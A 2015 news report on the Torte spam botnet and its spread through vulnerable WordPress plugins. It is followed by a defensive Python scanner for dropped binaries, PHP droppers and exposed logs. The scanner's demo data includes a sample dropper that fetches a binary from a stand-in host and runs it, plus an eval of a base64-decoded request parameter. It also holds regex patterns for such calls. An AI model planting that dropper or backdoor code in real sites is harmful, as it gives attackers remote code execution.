Botnet Leverages Vulnerable Sites

Thursday, November 5, 2015 @ 03:11 PM gHale

A new spam botnet called Torte infects machines via ELF Linux binaries and PHP scripts placed on the server’s filesystem.

The botnet is not the biggest ever discovered, but it is one of the largest in recent years, accounting for 83,000 infections across 2 of 4 infection layers, said researchers at Akamai SIRT (Security Intelligence Research Team).


While the ELF binary infections have only been seen on Linux machines, the infected PHP scripts have turned up on all types of server operating systems, showing the attackers can target a broader range of vulnerable systems.

SIRT researchers first became aware of the botnet after receiving a suspicious PHP script for analysis.

This script was the “dropper” part of the botnet, responsible for downloading and infecting the machine with more specialized tools.

Based on the operating system and hardware architecture it landed on, the dropper would download specific files that could handle a series of tasks.

Most of those files were identical. Using URLs hardcoded in the malicious files, the infected hosts would download email templates, dynamically assemble emails based on C&C instructions, and then send them out to victims.

In the cases where PHP scripts were used to infect machines, Akamai researchers were able to narrow down the source of the infections to WordPress sites with poor configuration and plugin practices.

Those configuration mistakes allowed the researchers to use a fine-tuned Google search to find infected sites, because some of them logged their error messages to publicly accessible directories that the search engine had indexed.

The earliest infections attributed to the Torte botnet date back to November 7, 2014 (via PHP scripts) and mid-August 2014 (for ELF binaries). Antivirus products did not detect the ELF binaries as malware.

Akamai said 60 percent of all active infections resided in WordPress sites. Joomla accounted only for 4 percent.

Infection paths linked back to WordPress plugin and theme files. Akamai detected 2,615 individual plugins across 16,374 domains, and 3,055 unique themes across 9,481 domains.

By cross-checking their list of detected plugins and themes against a published list of vulnerable plugins and themes, Akamai found that 70 percent of the plugins and 24 percent of the themes had been reported as vulnerable in the past.

The biggest victim was the Jetpack plugin from Automattic, the company behind WordPress.com. Akamai reported finding 1,768 sites where the infection linked back to the Jetpack plugin.

There were 59 versions of this plugin running on infected sites, and although some of them were up to date, 76 percent were lagging behind on updates.

Users who clicked on links inside the spam received from the botnet would end up directed to pages with hosted ads. Akamai said these landing pages also could be on other, previously compromised servers.

The Akamai report comes with two shell scripts to help webmasters identify and clean out infected servers.
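The article mentions Akamai's cleanup scripts but does not reproduce them, so the following is an added illustration written for this page, not Akamai's code. It hunts for the three artifact classes the article describes: ELF binaries dropped under a web root, PHP droppers that fetch a binary and eval decoded payloads, and error logs sitting inside the document root where a search engine could index them. The detection patterns, the WordPress path layout and the sample files it builds are all assumptions and constructed test data; nothing in it is a known Torte indicator.

```python
#!/usr/bin/env python3
"""Hunt for Torte-style artifacts under a web root (added illustration).

Checks three things the report calls out: ELF binaries dropped into
web-writable directories, PHP droppers that fetch a binary and eval decoded
payloads, and error logs written somewhere the web server may serve them.
Heuristics and paths are assumptions, not Akamai's detection scripts.
"""
import re
import tempfile
from pathlib import Path

ELF_MAGIC = b"\x7fELF"
PHP_EXTS = {".php", ".phtml", ".php5"}
LOG_NAMES = {"debug.log", "error_log", "php_errors.log"}

DECODE = rb"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("
NESTED_EVAL = re.compile(rb"\b(eval|assert|create_function)\s*\(\s*" + DECODE)
DOWNLOAD = re.compile(rb"\b(curl_exec|file_get_contents|fopen)\s*\(")
WRITE = re.compile(rb"\b(file_put_contents|fwrite)\s*\(")
EXEC = re.compile(rb"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(")


def is_elf(path: Path) -> bool:
    """ELF files have no business under a web root served by PHP."""
    with open(path, "rb") as fh:
        return fh.read(4) == ELF_MAGIC


def dropper_reasons(path: Path, rel: str) -> list:
    """Return why a PHP file looks like a dropper; empty list means benign."""
    src = path.read_bytes()
    reasons = []
    if rel.startswith("wp-content/uploads/"):
        reasons.append("php file in uploads directory")
    if NESTED_EVAL.search(src):
        reasons.append("eval of decoded payload")
    if DOWNLOAD.search(src) and WRITE.search(src):
        reasons.append("fetches and writes a file")
    if EXEC.search(src):
        reasons.append("executes a process")
    # Legitimate plugins also spawn processes or write files, so a lone
    # exec or write hit is not enough to flag a file.
    strong = {"php file in uploads directory", "eval of decoded payload"}
    if not (strong & set(reasons)) and len(reasons) < 2:
        return []
    return reasons


def scan(webroot) -> dict:
    """Walk the web root and return findings keyed by artifact class."""
    root = Path(webroot)
    findings = {"elf": [], "php": [], "logs": []}
    for path in sorted(root.rglob("*")):  # rglob includes dot-directories
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if is_elf(path):
            findings["elf"].append(rel)
        elif path.suffix.lower() in PHP_EXTS:
            reasons = dropper_reasons(path, rel)
            if reasons:
                findings["php"].append((rel, reasons))
        elif path.name in LOG_NAMES:
            # Inside the document root; confirm over HTTP whether it is served.
            findings["logs"].append(rel)
    return findings


def demo() -> dict:
    """Build a constructed sample web root (fake data) and scan it."""
    root = Path(tempfile.mkdtemp(prefix="torte-demo-"))
    files = {
        "wp-content/plugins/jetpack/jetpack.php":
            b"<?php\n/* Plugin Name: Jetpack\n   Version: 3.7.2 */\n"
            b"add_action('init', 'jetpack_init');\n",
        # Hypothetical dropped binary hidden in a dot-directory under uploads.
        "wp-content/uploads/2015/11/.cache/sess_a1b2":
            ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 61,
        # Hypothetical dropper: picks a binary by architecture, writes and runs it.
        "wp-content/uploads/2015/11/wp-info.php":
            b"<?php\n$u = 'http://example.invalid/bin/' . php_uname('m');\n"
            b"$b = file_get_contents($u);\nfile_put_contents('/tmp/.s', $b);\n"
            b"chmod('/tmp/.s', 0755);\nsystem('/tmp/.s &');\n"
            b"eval(base64_decode($_REQUEST['c']));\n",
        "wp-content/debug.log":
            b"[05-Nov-2015 15:11:02 UTC] PHP Notice: Undefined index: d\n",
    }
    for rel, data in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)
    return scan(root)


if __name__ == "__main__":
    for kind, hits in demo().items():
        for hit in hits:
            print(kind, hit)
```

Point `scan()` at a real document root (for example `scan("/var/www/html")`) and treat every hit as a lead rather than a verdict: plugins legitimately write files and spawn processes, which is why a single weak indicator is suppressed. The log check only proves the file sits inside the document root; whether it is actually served, which is what made the Google search in the article work, has to be confirmed with an HTTP request or a look at the web server's access rules.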